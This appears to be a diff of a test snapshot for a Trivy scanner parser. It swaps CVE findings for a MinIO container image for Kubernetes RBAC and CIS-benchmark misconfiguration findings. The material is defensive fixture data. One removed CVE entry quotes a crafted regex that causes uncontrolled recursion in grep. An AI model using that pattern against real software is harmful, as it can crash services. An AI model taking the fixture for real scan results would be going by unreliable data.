"https://www.cve.org/CVERecord?id=CVE-2019-1010023", + "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "https://avd.aquasec.com/misconfig/ksv041", ], }, - "category": "Vulnerability", - "description": "** DISPUTED ** GNU Libc current is affected by: Re-mapping current loaded library with malicious ELF file. The impact is: In worst case attacker may evaluate privileges. The component is: libld. The attack vector is: Attacker sends 2 ELF files to victim and asks to run ldd on it. ldd execute code. NOTE: Upstream comments indicate "this is being treated as a non-security bug and no real threat."", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", - "mitigation": undefined, - "name": "glibc: running ldd on malicious ELF leads to code execution because of wrong size computation", + "category": "Misconfiguration", + "description": "Check whether role permits managing secrets", + "location": "scb://trivy/?Kind=ClusterRole&Name=system:controller:persistent-volume-binder", + "mitigation": "Create a role which does not permit to manage secrets if not needed", + "name": "Do not allow management of secrets(Role permits management of secret(s))", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2019-1010023", - }, - { - "type": "URL", - "value": "http://www.securityfocus.com/bid/109167", + "value": "https://avd.aquasec.com/misconfig/ksv041", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2019-1010023", + "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'ClusterRole/system:controller:persistent-volume-binder' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV056", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "https://avd.aquasec.com/misconfig/ksv056", + ], + }, + "category": "Misconfiguration", + "description": "The ability to control which pods get service traffic directed to them allows for interception attacks. Controlling network policy allows for bypassing lateral movement restrictions.", + "location": "scb://trivy/?Kind=ClusterRole&Name=system:controller:persistent-volume-binder", + "mitigation": "Networking resources are only allowed for verbs 'list', 'watch', 'get'", + "name": "Do not allow management of networking resources(ClusterRole 'system:controller:persistent-volume-binder' should not have access to resources ["services", "endpoints", "endpointslices", "networkpolicies", "ingresses"] for verbs ["create", "update", "patch", "delete", "deletecollection", "impersonate", "*"])", + "references": [ { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-1010023", + "value": "https://avd.aquasec.com/misconfig/ksv056", }, { "type": "URL", - "value": "https://security-tracker.debian.org/tracker/CVE-2019-1010023", + "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'ClusterRole/system:controller:persistent-volume-binder' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV056", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "https://avd.aquasec.com/misconfig/ksv056", + ], + }, + "category": "Misconfiguration", + "description": "The ability to control which pods get service traffic directed to them allows for interception attacks. Controlling network policy allows for bypassing lateral movement restrictions.", + "location": "scb://trivy/?Kind=ClusterRole&Name=system:controller:persistent-volume-binder", + "mitigation": "Networking resources are only allowed for verbs 'list', 'watch', 'get'", + "name": "Do not allow management of networking resources(ClusterRole 'system:controller:persistent-volume-binder' should not have access to resources ["services", "endpoints", "endpointslices", "networkpolicies", "ingresses"] for verbs ["create", "update", "patch", "delete", "deletecollection", "impersonate", "*"])", + "references": [ { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=22851", + "value": "https://avd.aquasec.com/misconfig/ksv056", }, { "type": "URL", - "value": "https://support.f5.com/csp/article/K11932200?utm_source=f5support&utm_medium=RSS", + "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'ClusterRole/system:controller:replicaset-controller' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV048", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "https://avd.aquasec.com/misconfig/ksv048", + ], + }, + "category": "Misconfiguration", + "description": "Check whether role permits update/create of a malicious pod", + "location": "scb://trivy/?Kind=ClusterRole&Name=system:controller:replicaset-controller", + "mitigation": "Create a role which does not permit update/create of a malicious pod", + "name": "Do not allow update/create of a malicious pod(Role permits create/update of a malicious pod)", + "references": [ { "type": "URL", - "value": "https://ubuntu.com/security/CVE-2019-1010023", + "value": "https://avd.aquasec.com/misconfig/ksv048", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2019-1010023", + "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", }, ], - "severity": "LOW", + "severity": "HIGH", }, { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2019-1010024", - "installedVersion": "2.31-13+deb11u3", - "packageName": "libc6", + "foundIn": "Target: 'ClusterRole/system:controller:replication-controller' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV048", + "installedVersion": undefined, + "packageName": undefined, "references": [ - "http://www.securityfocus.com/bid/109162", - "https://access.redhat.com/security/cve/CVE-2019-1010024", - "https://nvd.nist.gov/vuln/detail/CVE-2019-1010024", - "https://security-tracker.debian.org/tracker/CVE-2019-1010024", - "https://sourceware.org/bugzilla/show_bug.cgi?id=22852", - "https://support.f5.com/csp/article/K06046097", - "https://support.f5.com/csp/article/K06046097?utm_source=f5support&utm_medium=RSS", - "https://ubuntu.com/security/CVE-2019-1010024", - "https://www.cve.org/CVERecord?id=CVE-2019-1010024", + "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "https://avd.aquasec.com/misconfig/ksv048", ], }, - "category": "Vulnerability", - "description": "** DISPUTED ** GNU Libc current is affected by: Mitigation bypass. The impact is: Attacker may bypass ASLR using cache of thread stack and heap. The component is: glibc. NOTE: Upstream comments indicate "this is being treated as a non-security bug and no real threat."", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", - "mitigation": undefined, - "name": "glibc: ASLR bypass using cache of thread stack and heap", + "category": "Misconfiguration", + "description": "Check whether role permits update/create of a malicious pod", + "location": "scb://trivy/?Kind=ClusterRole&Name=system:controller:replication-controller", + "mitigation": "Create a role which does not permit update/create of a malicious pod", + "name": "Do not allow update/create of a malicious pod(Role permits create/update of a malicious pod)", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2019-1010024", + "value": "https://avd.aquasec.com/misconfig/ksv048", }, { "type": "URL", - "value": "http://www.securityfocus.com/bid/109162", + "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'ClusterRole/system:controller:resourcequota-controller' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV046", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "https://avd.aquasec.com/misconfig/ksv046", + ], + }, + "category": "Misconfiguration", + "description": "Check whether role permits specific verb on wildcard resources", + "location": "scb://trivy/?Kind=ClusterRole&Name=system:controller:resourcequota-controller", + "mitigation": "Create a role which does not permit specific verb on wildcard resources", + "name": "No wildcard resource roles(Role permits specific verb on wildcard resource)", + "references": [ { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2019-1010024", + "value": "https://avd.aquasec.com/misconfig/ksv046", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-1010024", + "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'ClusterRole/system:controller:root-ca-cert-publisher' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV049", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "https://avd.aquasec.com/misconfig/ksv049", + ], + }, + "category": "Misconfiguration", + "description": "Some workloads leverage configmaps to store sensitive data or configuration parameters that affect runtime behavior that can be modified by an attacker or combined with another issue to potentially lead to compromise.", + "location": "scb://trivy/?Kind=ClusterRole&Name=system:controller:root-ca-cert-publisher", + "mitigation": "Remove write permission verbs for resource 'configmaps'", + "name": "Do not allow management of configmaps(ClusterRole 'system:controller:root-ca-cert-publisher' should not have access to resource 'configmaps' for verbs ["create", "update", "patch", "delete", "deletecollection", "impersonate", "*"])", + "references": [ { "type": "URL", - "value": "https://security-tracker.debian.org/tracker/CVE-2019-1010024", + "value": "https://avd.aquasec.com/misconfig/ksv049", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=22852", + "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", }, + ], + "severity": "MEDIUM", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'ClusterRole/system:kube-controller-manager' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV041", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "https://avd.aquasec.com/misconfig/ksv041", + ], + }, + "category": "Misconfiguration", + "description": "Check whether role permits managing secrets", + "location": "scb://trivy/?Kind=ClusterRole&Name=system:kube-controller-manager", + "mitigation": "Create a role which does not permit to manage secrets if not needed", + "name": "Do not allow management of secrets(Role permits management of secret(s))", + "references": [ { "type": "URL", - "value": "https://support.f5.com/csp/article/K06046097", + "value": "https://avd.aquasec.com/misconfig/ksv041", }, { "type": "URL", - "value": "https://support.f5.com/csp/article/K06046097?utm_source=f5support&utm_medium=RSS", + "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'ClusterRole/system:kube-controller-manager' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV041", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "https://avd.aquasec.com/misconfig/ksv041", + ], + }, + "category": "Misconfiguration", + "description": "Check whether role permits managing secrets", + "location": "scb://trivy/?Kind=ClusterRole&Name=system:kube-controller-manager", + "mitigation": "Create a role which does not permit to manage secrets if not needed", + "name": "Do not allow management of secrets(Role permits management of secret(s))", + "references": [ { "type": "URL", - "value": "https://ubuntu.com/security/CVE-2019-1010024", + "value": "https://avd.aquasec.com/misconfig/ksv041", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2019-1010024", + "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", }, ], - "severity": "LOW", + "severity": "HIGH", }, { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2019-1010025", - "installedVersion": "2.31-13+deb11u3", - "packageName": "libc6", + "foundIn": "Target: 'ClusterRole/system:kube-controller-manager' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV041", + "installedVersion": undefined, + "packageName": undefined, "references": [ - "https://access.redhat.com/security/cve/CVE-2019-1010025", - "https://nvd.nist.gov/vuln/detail/CVE-2019-1010025", - "https://security-tracker.debian.org/tracker/CVE-2019-1010025", - "https://sourceware.org/bugzilla/show_bug.cgi?id=22853", - "https://support.f5.com/csp/article/K06046097", - "https://support.f5.com/csp/article/K06046097?utm_source=f5support&utm_medium=RSS", - "https://ubuntu.com/security/CVE-2019-1010025", - "https://www.cve.org/CVERecord?id=CVE-2019-1010025", + "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "https://avd.aquasec.com/misconfig/ksv041", ], }, - "category": "Vulnerability", - "description": "** DISPUTED ** GNU Libc current is affected by: Mitigation bypass. The impact is: Attacker may guess the heap addresses of pthread_created thread. The component is: glibc. NOTE: the vendor's position is "ASLR bypass itself is not a vulnerability."", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", - "mitigation": undefined, - "name": "glibc: information disclosure of heap addresses of pthread_created thread", + "category": "Misconfiguration", + "description": "Check whether role permits managing secrets", + "location": "scb://trivy/?Kind=ClusterRole&Name=system:kube-controller-manager", + "mitigation": "Create a role which does not permit to manage secrets if not needed", + "name": "Do not allow management of secrets(Role permits management of secret(s))", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2019-1010025", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2019-1010025", + "value": "https://avd.aquasec.com/misconfig/ksv041", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-1010025", + "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'ClusterRole/system:kube-controller-manager' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV041", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "https://avd.aquasec.com/misconfig/ksv041", + ], + }, + "category": "Misconfiguration", + "description": "Check whether role permits managing secrets", + "location": "scb://trivy/?Kind=ClusterRole&Name=system:kube-controller-manager", + "mitigation": "Create a role which does not permit to manage secrets if not needed", + "name": "Do not allow management of secrets(Role permits management of secret(s))", + "references": [ { "type": "URL", - "value": "https://security-tracker.debian.org/tracker/CVE-2019-1010025", + "value": "https://avd.aquasec.com/misconfig/ksv041", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=22853", + "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'ClusterRole/system:kube-controller-manager' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV046", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "https://avd.aquasec.com/misconfig/ksv046", + ], + }, + "category": "Misconfiguration", + "description": "Check whether role permits specific verb on wildcard resources", + "location": "scb://trivy/?Kind=ClusterRole&Name=system:kube-controller-manager", + "mitigation": "Create a role which does not permit specific verb on wildcard resources", + "name": "No wildcard resource roles(Role permits specific verb on wildcard resource)", + "references": [ { "type": "URL", - "value": "https://support.f5.com/csp/article/K06046097", + "value": "https://avd.aquasec.com/misconfig/ksv046", }, { "type": "URL", - "value": "https://support.f5.com/csp/article/K06046097?utm_source=f5support&utm_medium=RSS", + "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'ClusterRole/system:kube-controller-manager' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV056", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "https://avd.aquasec.com/misconfig/ksv056", + ], + }, + "category": "Misconfiguration", + "description": "The ability to control which pods get service traffic directed to them allows for interception attacks. Controlling network policy allows for bypassing lateral movement restrictions.", + "location": "scb://trivy/?Kind=ClusterRole&Name=system:kube-controller-manager", + "mitigation": "Networking resources are only allowed for verbs 'list', 'watch', 'get'", + "name": "Do not allow management of networking resources(ClusterRole 'system:kube-controller-manager' should not have access to resources ["services", "endpoints", "endpointslices", "networkpolicies", "ingresses"] for verbs ["create", "update", "patch", "delete", "deletecollection", "impersonate", "*"])", + "references": [ { "type": "URL", - "value": "https://ubuntu.com/security/CVE-2019-1010025", + "value": "https://avd.aquasec.com/misconfig/ksv056", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2019-1010025", + "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", }, ], - "severity": "LOW", + "severity": "HIGH", }, { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2019-9192", - "installedVersion": "2.31-13+deb11u3", - "packageName": "libc6", + "foundIn": "Target: 'ClusterRole/system:kube-controller-manager' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV056", + "installedVersion": undefined, + "packageName": undefined, "references": [ - "https://access.redhat.com/security/cve/CVE-2019-9192", - "https://nvd.nist.gov/vuln/detail/CVE-2019-9192", - "https://sourceware.org/bugzilla/show_bug.cgi?id=24269", - "https://support.f5.com/csp/article/K26346590?utm_source=f5support&utm_medium=RSS", - "https://www.cve.org/CVERecord?id=CVE-2019-9192", + "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "https://avd.aquasec.com/misconfig/ksv056", ], }, - "category": "Vulnerability", - "description": "** DISPUTED ** In the GNU C Library (aka glibc or libc6) through 2.29, check_dst_limits_calc_pos_1 in posix/regexec.c has Uncontrolled Recursion, as demonstrated by '(|)(\\\\1\\\\1)*' in grep, a different issue than CVE-2018-20796. NOTE: the software maintainer disputes that this is a vulnerability because the behavior occurs only with a crafted pattern.", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", - "mitigation": undefined, - "name": "glibc: uncontrolled recursion in function check_dst_limits_calc_pos_1 in posix/regexec.c", + "category": "Misconfiguration", + "description": "The ability to control which pods get service traffic directed to them allows for interception attacks. Controlling network policy allows for bypassing lateral movement restrictions.", + "location": "scb://trivy/?Kind=ClusterRole&Name=system:kube-controller-manager", + "mitigation": "Networking resources are only allowed for verbs 'list', 'watch', 'get'", + "name": "Do not allow management of networking resources(ClusterRole 'system:kube-controller-manager' should not have access to resources ["services", "endpoints", "endpointslices", "networkpolicies", "ingresses"] for verbs ["create", "update", "patch", "delete", "deletecollection", "impersonate", "*"])", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2019-9192", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2019-9192", - }, - { - "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-9192", + "value": "https://avd.aquasec.com/misconfig/ksv056", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=24269", + "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'ClusterRole/system:kube-scheduler' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV056", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "https://avd.aquasec.com/misconfig/ksv056", + ], + }, + "category": "Misconfiguration", + "description": "The ability to control which pods get service traffic directed to them allows for interception attacks. Controlling network policy allows for bypassing lateral movement restrictions.", + "location": "scb://trivy/?Kind=ClusterRole&Name=system:kube-scheduler", + "mitigation": "Networking resources are only allowed for verbs 'list', 'watch', 'get'", + "name": "Do not allow management of networking resources(ClusterRole 'system:kube-scheduler' should not have access to resources ["services", "endpoints", "endpointslices", "networkpolicies", "ingresses"] for verbs ["create", "update", "patch", "delete", "deletecollection", "impersonate", "*"])", + "references": [ { "type": "URL", - "value": "https://support.f5.com/csp/article/K26346590?utm_source=f5support&utm_medium=RSS", + "value": "https://avd.aquasec.com/misconfig/ksv056", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2019-9192", + "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", }, ], - "severity": "LOW", + "severity": "HIGH", }, { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-1304", - "installedVersion": "1.46.2-2", - "packageName": "libcom-err2", + "foundIn": "Target: 'ClusterRole/system:kube-scheduler' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV056", + "installedVersion": undefined, + "packageName": undefined, "references": [ - "https://access.redhat.com/errata/RHSA-2022:8361", - "https://access.redhat.com/security/cve/CVE-2022-1304", - "https://bugzilla.redhat.com/2069726", - "https://bugzilla.redhat.com/show_bug.cgi?id=2069726", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1304", - "https://errata.almalinux.org/9/ALSA-2022-8361.html", - "https://errata.rockylinux.org/RLSA-2022:8361", - "https://linux.oracle.com/cve/CVE-2022-1304.html", - "https://linux.oracle.com/errata/ELSA-2022-8361.html", - "https://marc.info/?l=linux-ext4&m=165056234501732&w=2", - "https://nvd.nist.gov/vuln/detail/CVE-2022-1304", - "https://ubuntu.com/security/notices/USN-5464-1", - "https://www.cve.org/CVERecord?id=CVE-2022-1304", + "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "https://avd.aquasec.com/misconfig/ksv056", ], }, - "category": "Vulnerability", - "description": "An out-of-bounds read/write vulnerability was found in e2fsprogs 1.46.5. This issue leads to a segmentation fault and possibly arbitrary code execution via a specially crafted filesystem.", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", - "mitigation": undefined, - "name": "e2fsprogs: out-of-bounds read/write via crafted filesystem", + "category": "Misconfiguration", + "description": "The ability to control which pods get service traffic directed to them allows for interception attacks. Controlling network policy allows for bypassing lateral movement restrictions.", + "location": "scb://trivy/?Kind=ClusterRole&Name=system:kube-scheduler", + "mitigation": "Networking resources are only allowed for verbs 'list', 'watch', 'get'", + "name": "Do not allow management of networking resources(ClusterRole 'system:kube-scheduler' should not have access to resources ["services", "endpoints", "endpointslices", "networkpolicies", "ingresses"] for verbs ["create", "update", "patch", "delete", "deletecollection", "impersonate", "*"])", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-1304", + "value": "https://avd.aquasec.com/misconfig/ksv056", }, { "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2022:8361", + "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'ClusterRole/system:node' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV041", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "https://avd.aquasec.com/misconfig/ksv041", + ], + }, + "category": "Misconfiguration", + "description": "Check whether role permits managing secrets", + "location": "scb://trivy/?Kind=ClusterRole&Name=system:node", + "mitigation": "Create a role which does not permit to manage secrets if not needed", + "name": "Do not allow management of secrets(Role permits management of secret(s))", + "references": [ { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-1304", + "value": "https://avd.aquasec.com/misconfig/ksv041", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2069726", + "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'ClusterRoleBinding/admin-user' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV111", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "https://avd.aquasec.com/misconfig/ksv111", + ], + }, + "category": "Misconfiguration", + "description": "The RBAC role cluster-admin provides wide-ranging powers over the environment and should be used only where and when needed.", + "location": "scb://trivy/?Kind=ClusterRoleBinding&Name=admin-user", + "mitigation": "Identify all clusterrolebindings to the cluster-admin role. Check if they are used and if they need this role or if they could use a role with fewer privileges.", + "name": "Ensure that the cluster-admin role is only used where required(ClusterRoleBinding 'admin-user' with role 'cluster-admin' should be used only when required)", + "references": [ { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2069726", + "value": "https://avd.aquasec.com/misconfig/ksv111", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1304", + "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", }, + ], + "severity": "MEDIUM", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'ClusterRoleBinding/trivy-k8s' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV111", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "https://avd.aquasec.com/misconfig/ksv111", + ], + }, + "category": "Misconfiguration", + "description": "The RBAC role cluster-admin provides wide-ranging powers over the environment and should be used only where and when needed.", + "location": "scb://trivy/?Kind=ClusterRoleBinding&Name=trivy-k8s", + "mitigation": "Identify all clusterrolebindings to the cluster-admin role. Check if they are used and if they need this role or if they could use a role with fewer privileges.", + "name": "Ensure that the cluster-admin role is only used where required(ClusterRoleBinding 'trivy-k8s' with role 'cluster-admin' should be used only when required)", + "references": [ { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2022-8361.html", + "value": "https://avd.aquasec.com/misconfig/ksv111", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2022:8361", + "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", }, + ], + "severity": "MEDIUM", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'NodeInfo/kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KCV0056", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://www.cisecurity.org/benchmark/kubernetes", + "https://avd.aquasec.com/misconfig/kcv0056", + ], + }, + "category": "Misconfiguration", + "description": "Ensure that the container network interface file has permissions of 600 or more restrictive.", + "location": "scb://trivy/?Kind=NodeInfo&Name=kind-control-plane", + "mitigation": "Change the container network interface file path/to/cni/files permissions of 600 or more restrictive ", + "name": "Ensure that the container network interface file permissions are set to 600 or more restrictive(Ensure that the Container Network Interface specification file permissions is set to 600 or more restrictive)", + "references": [ { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-1304.html", + "value": "https://avd.aquasec.com/misconfig/kcv0056", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2022-8361.html", + "value": "https://www.cisecurity.org/benchmark/kubernetes", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'NodeInfo/kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KCV0059", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://www.cisecurity.org/benchmark/kubernetes", + "https://avd.aquasec.com/misconfig/kcv0059", + ], + }, + "category": "Misconfiguration", + "description": "Ensure that the etcd data directory ownership is set to etcd:etcd.", + "location": "scb://trivy/?Kind=NodeInfo&Name=kind-control-plane", + "mitigation": "Change the etcd data directory /var/lib/etcd ownership to etcd:etcd", + "name": "Ensure that the etcd data directory ownership is set to etcd:etcd(Ensure that the etcd data directory ownership is set to etcd:etcd)", + "references": [ { "type": "URL", - "value": "https://marc.info/?l=linux-ext4&m=165056234501732&w=2", + "value": "https://avd.aquasec.com/misconfig/kcv0059", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-1304", + "value": "https://www.cisecurity.org/benchmark/kubernetes", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'NodeInfo/kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KCV0068", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://www.cisecurity.org/benchmark/kubernetes", + "https://avd.aquasec.com/misconfig/kcv0068", + ], + }, + "category": "Misconfiguration", + "description": "Ensure that the Kubernetes PKI certificate file permission is set to 600.", + "location": "scb://trivy/?Kind=NodeInfo&Name=kind-control-plane", + "mitigation": "Change the Kubernetes PKI certificate file /etc/kubernetes/pki/*.crt permission to 600", + "name": "Ensure that the Kubernetes PKI certificate file permission is set to 600(Ensure that the Kubernetes PKI certificate file permission is set to 600)", + "references": [ { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5464-1", + "value": "https://avd.aquasec.com/misconfig/kcv0068", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-1304", + "value": "https://www.cisecurity.org/benchmark/kubernetes", }, ], "severity": "HIGH", }, { "attributes": { - "fixedVersion": "7.74.0-1.3+deb11u5", - "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-32221", - "installedVersion": "7.74.0-1.3+deb11u2", - "packageName": "libcurl4", + "fixedVersion": undefined, + "foundIn": "Target: 'NodeInfo/kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KCV0069", + "installedVersion": undefined, + "packageName": undefined, "references": [ - "http://seclists.org/fulldisclosure/2023/Jan/19", - "http://seclists.org/fulldisclosure/2023/Jan/20", - "http://www.openwall.com/lists/oss-security/2023/05/17/4", - "https://access.redhat.com/errata/RHSA-2023:0333", - "https://access.redhat.com/security/cve/CVE-2022-32221", - "https://bugzilla.redhat.com/2135411", - "https://bugzilla.redhat.com/show_bug.cgi?id=2135411", - "https://curl.se/docs/CVE-2022-32221.html", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32221", - "https://errata.almalinux.org/9/ALSA-2023-0333.html", - "https://errata.rockylinux.org/RLSA-2023:0333", - "https://hackerone.com/reports/1704017", - "https://linux.oracle.com/cve/CVE-2022-32221.html", - "https://linux.oracle.com/errata/ELSA-2023-0333.html", - "https://lists.debian.org/debian-lts-announce/2023/01/msg00028.html", - "https://nvd.nist.gov/vuln/detail/CVE-2022-32221", - 